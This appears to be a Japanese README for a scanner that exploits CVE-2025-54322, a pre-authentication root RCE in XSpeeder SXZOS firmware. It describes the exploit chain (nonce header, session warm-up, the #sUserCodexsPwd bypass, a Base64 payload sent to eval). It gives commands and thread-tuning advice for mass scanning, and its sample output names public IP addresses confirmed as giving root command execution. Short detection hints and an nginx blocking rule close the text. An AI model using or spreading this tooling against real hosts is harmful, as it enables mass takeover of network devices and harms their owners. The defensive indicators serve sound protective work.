
CVE-2025-54322 - XSpeeder SXZOS 事前認証RCEゼロデイ高速発見ツール
CVE-2025-54322 のマルチスレッド脆弱性スキャナーです。これは XSpeeder SXZOS ファームウェアにおける認証不要のリモートコード実行脆弱性で、世界中の約 70,000 台以上のホストに影響を与えます。
CVE-2025-54322 は、SD-WAN デバイス、ルーター、エッジネットワーク機器を動作させる XSpeeder SXZOS ファームウェアで発見された、事前認証リモートコード実行の重大な脆弱性です。
この脆弱性は SXZOS ファームウェアの Django ベースの Web インターフェースに存在します。
/?title=ABC&oIp=XXX&chkid=[base64_payload]eval() 関数の安全でない使用1. X-SXZ-R ヘッダーの時間ベース nonce を計算
2. /webInfos/ エンドポイント経由でセッションをウォームアップ
3. バイパス文字列 (#sUserCodexsPwd) を含む悪意のあるペイロードを作成
4. ペイロードを Base64 エンコード
5. 正確に3つのクエリパラメータを持つエクスプロイトを送信
6. サーバーがペイロードをデコードして評価
7. コマンドがルート権限で実行される
このエクスプロイトは複数の防御層をバイパスします:
SXZ/2.3 で偽装X-SXZ-R: [0-6]/webInfos/ 経由でウォームアップ#sUserCodexsPwd コメントでバイパスvuln-confirm.txt に保存# リポジトリをクローン
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# 必要な依存関係をインストール
pip install -r requirements.txt
requirements.txt ファイルを作成します:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# カスタムスレッド数でスキャン(デフォルト: 10)
python3 scanner.py targets.txt 20
# 最大スレッドで高速スキャン
python3 scanner.py targets.txt 50
# 控えめなスレッド数でスキャン
python3 scanner.py targets.txt 5
targets.txt ファイルを1行に1ターゲットずつ作成します:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...
======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================
[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable
======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================
スキャナーは以下を表示します:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds
| ターゲット数 | 推奨スレッド数 | 予想時間 |
|---|---|---|
| 1-10 | 5 threads | ~1-2 分 |
| 10-50 | 10 threads | ~3-5 分 |
| 50-100 | 20 threads | ~5-10 分 |
| 100-500 | 30 threads | ~10-20 分 |
| 500+ | 40-50 threads | ~20+ 分 |
このツールは教育目的および許可されたセキュリティテスト目的でのみ提供されます。
脆弱なシステムを発見した場合:
XSpeeder SXZOS デバイスを管理している場合:
ログでこれらの兆候を探してください:
/?title=*&oIp=*&chkid=* へのリクエストSXZ/2.3X-SXZ-R ヘッダー#sUserCodexsPwd を含む Base64 文字列/webInfos/ への複数リクエストの後にルートパスへのリクエスト# 悪用試行をブロックする Nginx ルール
location / {
if ($args ~* "chkid=") {
return 403;
}
}
この脆弱性は、AI を活用したセキュリティ研究プラットフォーム pwn.ai によって自律的に発見されました。
重要な注意: これは、エージェントによって発見され、文書化された初の公開既知のリモートで悪用可能なゼロデイ RCE 脆弱性です。
Chirag Artani
このスキャナー実装は、以下の目的でセキュリティ専門家を支援するために作成されました:
このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。
コントリビューションを歓迎します!プルリクエストを遠慮なく送信してください。
質問、問題、または提案がある場合:
忘れないでください: 大きな力には大きな責任が伴います。このツールを倫理的かつ合法的に使用してください。
安全に、倫理的に、合法的に行動しましょう。